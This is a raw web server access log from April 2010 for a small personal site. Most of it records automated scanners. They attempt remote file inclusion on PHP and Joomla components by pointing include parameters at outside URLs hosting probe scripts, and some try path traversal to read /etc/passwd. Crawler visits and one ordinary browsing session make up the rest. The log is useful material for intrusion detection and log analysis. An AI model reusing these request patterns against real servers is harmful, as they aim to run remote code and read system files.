82.102.6.110 - - [15/Apr/2010:19:07:01 -0500] "GET /logs/access_log.1220054400%20%20////?_SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//zfxid.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:19:07:01 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//zfxid.txt? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:19:07:01 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//zfxid.txt? HTTP/1.1" 200 1955 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:07:22 -0500] "GET /logs/access_log.1266710400//include/new-visitor.inc.php?lvc_include_dir=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:07:22 -0500] "GET //include/new-visitor.inc.php?lvc_include_dir=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:07:22 -0500] "GET /logs//include/new-visitor.inc.php?lvc_include_dir=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:07:22 -0500] "GET /logs/access_log.1264896000//include/new-visitor.inc.php?lvc_include_dir=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
75.125.94.114 - - [15/Apr/2010:19:07:57 -0500] "GET /logs/access_log.1213488000//images/errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
75.125.94.114 - - [15/Apr/2010:19:07:57 -0500] "GET /logs//images/errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
75.125.94.114 - - [15/Apr/2010:19:07:57 -0500] "GET //images/errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
217.70.32.2 - - [15/Apr/2010:19:08:04 -0500] "GET //include/new-visitor.inc.php?lvc_include_dir=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:08:04 -0500] "GET /logs//include/new-visitor.inc.php?lvc_include_dir=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:08:04 -0500] "GET /logs/access_log.1264896000//include/new-visitor.inc.php?lvc_include_dir=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:19:08:13 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//zfxid.txt? HTTP/1.1" 200 1955 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:19:08:14 -0500] "GET /logs/access_log.1220054400%20%20////?_SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//zfxid.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:19:08:14 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//zfxid.txt? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
207.46.199.53 - - [15/Apr/2010:19:09:12 -0500] "GET /?S=A HTTP/1.1" 200 1003 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.177 - - [15/Apr/2010:19:10:26 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
125.251.197.130 - - [15/Apr/2010:19:10:53 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://kpaa.or.kr/int/adm/img/id1.txt? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
125.251.197.130 - - [15/Apr/2010:19:10:53 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://kpaa.or.kr/int/adm/img/id1.txt? HTTP/1.1" 200 1956 "-""Mozilla/5.0"
125.251.197.130 - - [15/Apr/2010:19:10:53 -0500] "GET /logs/access_log.1236297600%20%20/////?_SERVER[DOCUMENT_ROOT]=http://kpaa.or.kr/int/adm/img/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
125.251.197.130 - - [15/Apr/2010:19:10:57 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://kpaa.or.kr/int/adm/img/id1.txt? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
125.251.197.130 - - [15/Apr/2010:19:10:58 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://kpaa.or.kr/int/adm/img/id1.txt? HTTP/1.1" 200 1956 "-""Mozilla/5.0"
125.251.197.130 - - [15/Apr/2010:19:10:58 -0500] "GET /logs/access_log.1236297600/////?_SERVER[DOCUMENT_ROOT]=http://kpaa.or.kr/int/adm/img/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
186.28.232.13 - - [15/Apr/2010:19:11:20 -0500] "GET /logs/access_log.1213488000//images/errors.php?error=http://jspo.org/images/gallery/id.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
186.28.232.13 - - [15/Apr/2010:19:11:20 -0500] "GET //images/errors.php?error=http://jspo.org/images/gallery/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
186.28.232.13 - - [15/Apr/2010:19:11:20 -0500] "GET /logs//images/errors.php?error=http://jspo.org/images/gallery/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
82.102.6.110 - - [15/Apr/2010:19:11:38 -0500] "GET /logs/access_log.1220054400////?_SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//zfxid.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:15:42 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:15:42 -0500] "GET /logs/access_log.1220054400%20%20//modules/agendax/addevent.inc.php?agendax_path=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:15:42 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:16:50 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:16:50 -0500] "GET /logs/access_log.1260662400//modules/agendax/addevent.inc.php?agendax_path=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:16:50 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:16:58 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:16:58 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:16:58 -0500] "GET /logs/access_log.1220054400//modules/agendax/addevent.inc.php?agendax_path=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:18:06 -0500] "GET /logs/access_log.1219708800//modules/agendax/addevent.inc.php?agendax_path=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:18:37 -0500] "GET /logs/access_log.1219708800%20%20//modules/agendax/addevent.inc.php?agendax_path=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
207.46.13.146 - - [15/Apr/2010:19:20:42 -0500] "GET /logs/access_log.1253145600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.70.32.2 - - [15/Apr/2010:19:22:44 -0500] "GET /logs//shoutbox/expanded.php?conf=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:22:44 -0500] "GET /logs/access_log.1266710400//shoutbox/expanded.php?conf=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:22:44 -0500] "GET //shoutbox/expanded.php?conf=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:23:11 -0500] "GET /logs//shoutbox/expanded.php?conf=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:23:11 -0500] "GET /logs/access_log.1262822400//shoutbox/expanded.php?conf=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:23:11 -0500] "GET //shoutbox/expanded.php?conf=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:23:19 -0500] "GET /logs/access_log.1266710400//shoutbox/expanded.php?conf=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
207.46.13.87 - - [15/Apr/2010:19:24:30 -0500] "GET /logs/access_log.1238630400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.90 - - [15/Apr/2010:19:26:29 -0500] "GET /logs/access_log.1259020800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.70.32.2 - - [15/Apr/2010:19:30:08 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:30:08 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:30:08 -0500] "GET /logs/access_log.1219536000//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:30:57 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:30:57 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:30:57 -0500] "GET /logs/access_log.1268956800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:31:05 -0500] "GET /logs/access_log.1214870400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:31:54 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:31:54 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:31:54 -0500] "GET /logs/access_log.1268956800%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
217.70.32.2 - - [15/Apr/2010:19:32:16 -0500] "GET /logs/access_log.1265241600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nakeds.interfree.it/FxID1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
207.46.199.44 - - [15/Apr/2010:19:34:00 -0500] "GET /logs/access_log.1229558400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.142 - - [15/Apr/2010:19:49:31 -0500] "GET /logs/access_log.1240790400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [15/Apr/2010:19:49:39 -0500] "GET /logs/access_log.1242604800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/Apr/2010:19:49:41 -0500] "GET /logs/access_log.1243382400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/Apr/2010:19:49:44 -0500] "GET /logs/access_log.1244419200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/Apr/2010:19:49:47 -0500] "GET /logs/access_log.1244505600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/Apr/2010:19:49:50 -0500] "GET /logs/access_log.1244678400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/Apr/2010:19:49:53 -0500] "GET /logs/access_log.1244937600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/Apr/2010:19:49:56 -0500] "GET /logs/access_log.1246060800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/Apr/2010:19:50:00 -0500] "GET /logs/access_log.1246147200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/Apr/2010:19:50:03 -0500] "GET /logs/access_log.1246406400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [15/Apr/2010:19:50:07 -0500] "GET /logs/access_log.1246579200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
119.63.193.56 - - [15/Apr/2010:19:58:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
65.55.207.136 - - [15/Apr/2010:20:02:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.75.62.10 - - [15/Apr/2010:20:04:20 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
202.75.62.10 - - [15/Apr/2010:20:04:21 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
202.75.62.10 - - [15/Apr/2010:20:04:27 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
202.75.62.10 - - [15/Apr/2010:20:04:28 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
202.75.62.10 - - [15/Apr/2010:20:04:28 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
202.75.62.10 - - [15/Apr/2010:20:04:34 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
202.75.62.10 - - [15/Apr/2010:20:04:42 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
202.75.62.10 - - [15/Apr/2010:20:04:51 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
202.75.62.10 - - [15/Apr/2010:20:04:52 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
202.75.62.10 - - [15/Apr/2010:20:04:56 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
202.75.62.10 - - [15/Apr/2010:20:04:57 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
206.80.1.253 - - [15/Apr/2010:20:06:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
206.80.1.253 - - [15/Apr/2010:20:06:42 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
207.46.195.232 - - [15/Apr/2010:20:09:29 -0500] "GET /logs/access_log.1239321600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.60.20.242 - - [15/Apr/2010:20:11:41 -0500] "GET /logs///oneadmin/photogallery/include.php?path[docroot]=http://www.chocolatelime.co.uk/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
65.60.20.242 - - [15/Apr/2010:20:11:41 -0500] "GET ///oneadmin/photogallery/include.php?path[docroot]=http://www.chocolatelime.co.uk/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.60.20.242 - - [15/Apr/2010:20:11:41 -0500] "GET /logs/access_log.1212105600%20%20///oneadmin/photogallery/include.php?path[docroot]=http://www.chocolatelime.co.uk/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
65.60.20.242 - - [15/Apr/2010:20:13:23 -0500] "GET ///oneadmin/photogallery/include.php?path[docroot]=http://www.chocolatelime.co.uk/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.60.20.242 - - [15/Apr/2010:20:13:23 -0500] "GET /logs/access_log.1212105600%20%20///oneadmin/photogallery/include.php?path[docroot]=http://www.chocolatelime.co.uk/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
65.60.20.242 - - [15/Apr/2010:20:13:23 -0500] "GET /logs///oneadmin/photogallery/include.php?path[docroot]=http://www.chocolatelime.co.uk/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.46.13.85 - - [15/Apr/2010:20:15:30 -0500] "GET /logs/access_log.1178668800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.198 - - [15/Apr/2010:20:16:16 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.102.6.110 - - [15/Apr/2010:20:17:11 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:20:17:11 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:20:17:11 -0500] "GET /logs/access_log.1219708800%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:20:17:15 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:20:17:15 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:20:17:15 -0500] "GET /logs/access_log.1219708800%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:20:17:16 -0500] "GET /logs/access_log.1219708800%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:20:17:16 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:20:17:16 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:20:17:18 -0500] "GET /logs/access_log.1220054400%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:20:17:20 -0500] "GET /logs/access_log.1220054400%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:20:17:21 -0500] "GET /logs/access_log.1220054400%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
216.18.214.234 - - [15/Apr/2010:20:25:56 -0500] "GET //index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
67.228.111.219 - - [15/Apr/2010:20:25:58 -0500] "GET //index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
209.16.102.2 - - [15/Apr/2010:20:25:59 -0500] "GET //index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
64.165.76.12 - - [15/Apr/2010:20:26:01 -0500] "GET //index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
94.23.204.54 - - [15/Apr/2010:20:26:04 -0500] "GET //index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
92.48.74.7 - - [15/Apr/2010:20:26:23 -0500] "GET //index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
216.18.214.234 - - [15/Apr/2010:20:26:43 -0500] "GET /logs/access_log.1219708800//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
216.18.214.234 - - [15/Apr/2010:20:26:43 -0500] "GET //index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
216.18.214.234 - - [15/Apr/2010:20:26:44 -0500] "GET /logs//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
78.110.50.133 - - [15/Apr/2010:20:27:02 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
78.110.50.133 - - [15/Apr/2010:20:27:04 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
64.165.76.12 - - [15/Apr/2010:20:27:04 -0500] "GET /logs/access_log.1219708800//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
64.165.76.12 - - [15/Apr/2010:20:27:04 -0500] "GET //index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
64.165.76.12 - - [15/Apr/2010:20:27:05 -0500] "GET /logs//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
67.228.111.219 - - [15/Apr/2010:20:27:06 -0500] "GET /logs/access_log.1219708800//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
67.228.111.219 - - [15/Apr/2010:20:27:06 -0500] "GET //index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
67.228.111.219 - - [15/Apr/2010:20:27:06 -0500] "GET /logs//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
78.110.50.133 - - [15/Apr/2010:20:27:09 -0500] "GET /logs/access_log.1220054400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
